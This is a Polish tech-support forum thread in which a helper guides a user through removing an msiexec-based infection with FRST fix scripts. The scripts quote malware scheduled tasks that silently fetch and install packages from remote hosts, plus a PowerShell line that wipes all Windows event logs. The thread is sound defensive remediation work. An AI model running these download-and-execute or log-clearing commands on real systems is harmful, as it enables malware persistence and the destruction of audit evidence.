paweleke Opublikowano 15 Stycznia 2019 Zgłoś Udostępnij Opublikowano 15 Stycznia 2019 Cześć. Od pewnego czasu mam denerwujący i intrygujący mnie problem. Kiedy włączam przeglądarkę i próbuje wyszukać bardziej znane programy antywirusowe przeglądarka zacina się "brak odpowiedzi". Podobnie jest z instalacją oprogramowania antywirusowego. W trybie awaryjnym wszystko działa dlatego byłem w stanie sporządzić logi (w trybie normalnym frst "brak odpowiedzi"). Program Zemana wskazuje na widoczne w logu ("skanowanie.txt") "naruszone procesy", które w prawdzie naprawiając rozwiązuje problemy, ale po pewnym czasie (lub po ponownym uruchomieniu komputera - nie jestem pewien) ponownie się pojawiają i problem wraca. Próbowałem skanować bootowalnymi antywirusami jednak bez skutku. Logi: Skanowanie.txt FRST.txt Shortcut.txt Addition.txt Odnośnik do komentarza
jessica Opublikowano 15 Stycznia 2019 Zgłoś Udostępnij Opublikowano 15 Stycznia 2019 Ta sama infekcja, co w temacie https://www.fixitpc.pl/topic/34454-prośba-o-pomoc-otwieranie-różnych-stron-w-firefox/ Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe C:\Users\PiotriPawel\AppData\Roaming\dfIMY.exe C:\Program Files (x86)\Common Files\eipFKxy.exe C:\Users\PiotriPawel\AppData\Local\imw.ini Task: {4E973841-FF20-4A0D-987F-52FDDE1CBE2E} - System32\Tasks\ikwmdb => "msiexec" -package hxxps://guardname.net/vvohqowru.gtb /q Task: {C83F099F-5CBB-446C-83B0-B427D7F10F96} - System32\Tasks\oicieucak => "msiexec" /q -package hxxps://guardname.net/yfyuiejeluijii.iia Task: {E2D671E8-287A-43D2-B319-8701BCFEBBF1} - System32\Tasks\{882E246F-2FA3-E339-BC45-CBDDDC20F917} => "msiexec.exe" /package hxxps://sensernyteg.com/ef4jom666zm0.ayo -q FirewallRules: [{75CE7C8F-6BB8-4006-8B8F-5B8C6945E34F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku FirewallRules: [{574CB234-5DCE-4490-8CE6-9EE91990E1B2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku FirewallRules: [{89E78528-CFEF-4C16-8439-C4C7AE406EE1}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Corporation) FirewallRules: [{2AE89C34-DFB0-4383-A3D0-FA1200F50B90}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe (Microsoft Corporation) FirewallRules: [{621AD324-338C-4230-96EB-F06F163E5E44}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\dfIMY.exe (Microsoft Corporation) FirewallRules: [{28C7E986-1664-4095-A9E8-29D2B5EE3C7C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{14CC1F92-7FF3-4A95-8E9A-91E7F89854DA}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{580D3253-DD94-4BEE-8013-85010777EB6A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C674A19A-0368-4E9E-A724-2F9CA8669AE8}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9AC2EACE-C681-4DA9-9AA7-E606F8504EA6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{478EF7F6-ECB4-40DF-A924-AFC9B0F333A5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{3C2A97E8-1833-4A09-A37C-C94DEF62C454}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{F95C4A4F-FB53-4B40-AA79-5DCB8A6BCC83}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{68460C64-4893-4A56-A454-AAE08AB98F8C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{FE1E318C-09DF-4D9F-9C88-14C201EF90EC}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{4038070B-1149-418C-A7A0-A00B72B57B5E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{4F8972FB-51C9-4BB7-9388-B79FB4290166}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{314C2202-F092-4D59-AA29-D7EE3DC7C21A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{E7235ABD-6BE0-4570-ABA3-44274B50AE7E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7A141189-0F39-462C-887C-34EEAF7EDEEB}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{FC65A9B2-E3AC-4AC7-BD71-043D74123179}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{F41BFFC7-1E30-4F8F-B853-498012B2D78C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CEF9D5C6-FBC2-44CA-9822-95959763393B}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{DB3221D9-C0BA-4FCB-96DF-A0844282C5B1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{3B9C2F88-C12A-442E-8F05-7131792988B2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{5E268DA2-05A1-4B0C-91A8-2FCB44A2A5F4}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{02C78E1E-19DC-4D8F-AC43-B33C01403207}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{5E95164C-A1D4-4B1D-A089-AFC522677527}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1C55584E-6743-46A4-9231-3A258A419D33}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{0B871134-8B0E-49A9-A4D7-81C692024DDD}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{723E2A70-C9DF-47EA-B34D-F006049E9930}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{763D3ECB-937B-4862-802D-407A7BFBA617}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{D5C3EFBB-A792-48E6-9D63-C728CBF61FCC}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{4481E404-A1A7-4CBB-B943-E8AAB1052661}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7D13013C-DC69-4707-A15A-D174188D5F56}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CD61EC9E-8D79-47C9-B282-48B99886C87D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{A160397A-628E-4CD1-81AC-16846FACB6A2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{15F87A5F-A1F9-4936-9F61-23E46413FB41}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{998E7063-6D3F-43A7-8854-C885BDC29ADE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{64A2D984-4840-41FE-A69B-87A15F0D3E5F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C0E24F2D-B3B6-4D44-AFB5-47A32C435FA2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7F5A7F90-80B4-4AD5-94F9-6AD7EF6BBC8D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{049882C7-C382-400D-AEAA-F71B5EC7F983}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1B9B5F0B-2360-421E-8215-7CB275709CCF}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{FEA10243-7023-41CE-A0F6-8BADA1F95372}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{7604B851-B8AE-436E-82C1-A579CC629BA0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{DF358776-9A5B-4004-8DE9-CEEA6E790BF9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{25AF8F04-362B-46DD-9DDC-E56E33F138FB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{402855D2-E310-48EC-87E2-7FD561E96745}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1423FA9A-F059-418D-9EC0-3CCB097C6CE6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7085492C-4BB7-4B81-8074-232A8E2E0399}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{3D999900-8F5F-4893-B6B8-289FD68DE0A7}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{87E6ED9C-7A9A-4186-A2F7-800615F6359C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{3979ACEE-2A02-4DF7-9327-EAB5DDB1481B}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{49EBFB73-F5A0-4BF6-A44B-164AB124C295}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{63F293D2-19FF-40DA-83CD-61D27F488C35}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{3FFB4C77-991A-4898-B684-83CF83EDF2F4}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{0F03AD7A-AC49-4A79-8905-047B1BEA7342}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CF110651-67AE-4D9B-8B85-AF80B6EAD2F6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{86DB424B-5F21-422B-9E20-309FB0A138D3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9BEFB80F-183D-49B6-B4DC-4AA6BCAE00B4}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{0AE71CCB-576C-4DEB-974F-D94BDCE12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{385B4813-5994-4DA0-98C7-5A5545EED619}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{D212A030-E4D7-424D-ADC0-F6900DB3F0CB}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{85BD9226-0403-47DF-82EA-DCC5AC1C07AC}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{EEC05465-2D4F-4ECA-ABD7-9882F2619FAA}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{41AB0D6B-D352-49C8-9905-3846E6B68C73}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{03D6D66E-4E80-4793-BC57-7A7F3E8B057C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{82ACFCE4-A10C-4CD7-A2E4-A8891AEBF79F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{188CE4CC-27A3-46E4-97A4-B6A7C7821D64}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C289590C-EF3F-425B-961D-0A8F4DD4CF6B}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{8E9EA2A2-B2F9-49FB-97AD-92288A381598}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{6C179524-2B12-4AB2-8287-4A9E14EA3EB7}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{5BE3D764-87AC-4B42-9EA6-42DDA9159C3F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{B025F1E6-FDC3-449A-8391-416D609C275F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{264D0C92-DAB6-437F-9437-C71E44289774}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C73A08B3-2032-4ABF-8E2F-5482E7E25520}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{98F7DAEB-1325-473D-885D-FD8E21739137}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{31585901-D6FC-48C0-881E-6DB84016D812}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{690599C5-89A7-4865-9BA0-378B2289120F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{A12EE20A-0134-48B2-8EDA-C6C0F6DDA46A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{ED63AC68-11D0-409A-84D7-B2CE8BD8DE43}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1F589736-30F1-48A4-B23E-115424D72A05}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{21CA5531-16E6-46E3-BC53-C91B645B3175}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9E4C2E4A-607D-4E83-B300-93AEEF856AED}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{61301919-9073-4E64-8E27-391E7359008E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{676EE2B6-5675-4E6F-AE46-594256B56DC5}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{E78F0871-D3CC-402D-8C96-67D6A493C387}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{E8E1E460-DC0E-41F5-A4A5-8A7E048D706E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{8A12E03E-C29C-4471-A9AB-9DF4BE54B463}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7264C442-3F7C-4EC5-AC18-948C0C48E172}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{B40941F4-555D-42F6-BA96-9638F6C7B049}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{4743698F-EE18-4BD3-99B0-84EBA9B814A4}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{B796D154-77E5-49BD-A1E7-F01FDF9CFCDA}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{D81DA265-01DC-4F9E-85C1-69E92D5C65E7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{AC8299AD-2B61-4F83-B1C6-035E5C9A4C67}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{A3058A23-5D2A-4347-8853-59C64A87CBD0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{52DAD159-C46F-4E27-B7B6-8592B247CCF5}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{250BDB1A-8D4B-4C41-8164-16B5DED39524}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7F0E529E-8932-4DAD-8754-05F5ABBDF29C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{4EF4392E-1DE3-4E2A-8091-D2A7B5EB529D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{2B3BDD22-3C15-473F-9A34-D6F4630B816A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{E4037783-5C89-417B-8068-9CF323EC692C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{5110476F-C7F8-4D69-A98C-87189CBCEC3A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{EA4EC93D-D2CB-49E0-A02B-A99751E06003}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{605FD0F1-3546-4E75-9D7B-D51A0D5061FA}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CB2CAD01-C542-485F-A7FB-ADE6F54EF1C3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe, [33792 2018-09-15] (Microsoft Corporation) ShellExecuteHooks: Brak nazwy - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - -> Brak pliku ShellExecuteHooks-x32: Brak nazwy - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - -> Brak pliku HOSTS: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku HOSTS: FirewallRules: [{C49A17C8-7A52-4483-A3D1-F2518D16FE53}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku FirewallRules: [{AEA7D350-3B5A-4355-81BD-0223CDD934E5}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku GroupPolicy: Ograniczenia ? <==== UWAGA HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <==== UWAGA C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk C:\Users\PiotriPawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free.lnk C:\Users\PiotriPawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). Zrób nowe logi FRST. jessi Odnośnik do komentarza
paweleke Opublikowano 15 Stycznia 2019 Autor Zgłoś Udostępnij Opublikowano 15 Stycznia 2019 Dzięki za szybką, odpowiedź. Zrobiłem tak jak powiedziałas i wszystko wydaję się być już teraz sprawne. Niemniej jednak zrobiłem logi i załączam je poniżej. Jeżeli stwierdzisz, że wszystko jest okej, chciałbym jeszcze prosić o wytłumaczenie co było powodem, co to za wirus jak działał, gdzie siedział, czemu antywirusy go nie widziały, itp. Z góry dzięki i miłego wieczorku życzę :) LOGI: Addition.txt Fixlog.txt FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 15 Stycznia 2019 Zgłoś Udostępnij Opublikowano 15 Stycznia 2019 Jeszcze nie wszystko: Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe FirewallRules: [{FCC20B83-E97C-4480-8D03-342CEB67D6F6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{42BE78AC-5978-4EAE-9693-B4C7F7B4467F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{9DAA05A9-4136-473E-AC3D-C3334B56CD3C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{B102FF1D-FDEF-4FF0-92E4-6C6F2CE84E81}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) HOSTS: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). Infekcja dostała się na komputer z jakąś grą, ale nie pamiętam, która to konkretnie gra. Infekcja zaraża "msiexec", a jej pliki zawsze są w folderach: C:\Users\nazwa użytownika\AppData\Roaming C:\Program Files\Common Files C:\Users\nazwa użytownika\AppData\Local C:\Program Files Nie wiem, dlaczego antywirusy jeszcze nie nauczyły się wykrywać tę infekcję. Cytat Task: {4142DA09-42F9-44A0-ADF4-371C97BD6CE2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2019-01-14] (AVAST Software) 2019-01-15 14:51 - 2019-01-15 14:51 - 000000000 ____D C:\ProgramData\Emsisoft 2019-01-11 20:04 - 2019-01-11 20:04 - 000057640 _____ C:\ProgramData\agent.uninstall.1547233462.bdinstall.v2.bin 2019-01-11 10:32 - 2019-01-11 10:32 - 000076892 _____ C:\ProgramData\agent.update.1547199122.bdinstall.v2.bin 2019-01-11 01:15 - 2019-01-11 01:15 - 000000000 ____D C:\ProgramData\Bitdefender 2019-01-11 01:14 - 2019-01-11 01:14 - 000000000 ____D C:\Users\PiotriPawel\AppData\Roaming\QuickScan 2019-01-11 01:12 - 2019-01-11 01:12 - 000102924 _____ C:\ProgramData\agent.1547165525.bdinstall.v2.bin 2019-01-11 01:12 - 2019-01-11 01:12 - 000000000 ____D C:\ProgramData\Bitdefender Agent 2019-01-11 01:11 - 2019-01-11 01:11 - 010372016 _____ C:\Users\PiotriPawel\Downloads\bitdefender_online.exe 2019-01-07 20:44 - 2019-01-07 20:45 - 000000000 ____D C:\ProgramData\F-Secure 2019-01-07 20:44 - 2019-01-07 20:44 - 000000000 ____D C:\Users\PiotriPawel\AppData\Local\F-Secure Z czego nie będziesz korzystał, to usuń. jessi Odnośnik do komentarza
paweleke Opublikowano 16 Stycznia 2019 Autor Zgłoś Udostępnij Opublikowano 16 Stycznia 2019 Jeszcze raz wielkie dzięki, Jess :) Czy możliwe, że była to gra RUST? :D Swoją drogą, fajne to narzędzie i chyba się zabiorę za ogarnięcie jak to działa :D Pozdrawiam :) Wstawiam swieże logi: Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 16 Stycznia 2019 Zgłoś Udostępnij Opublikowano 16 Stycznia 2019 W nowych logach nie widzę już niczego do usuwania. jessi Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się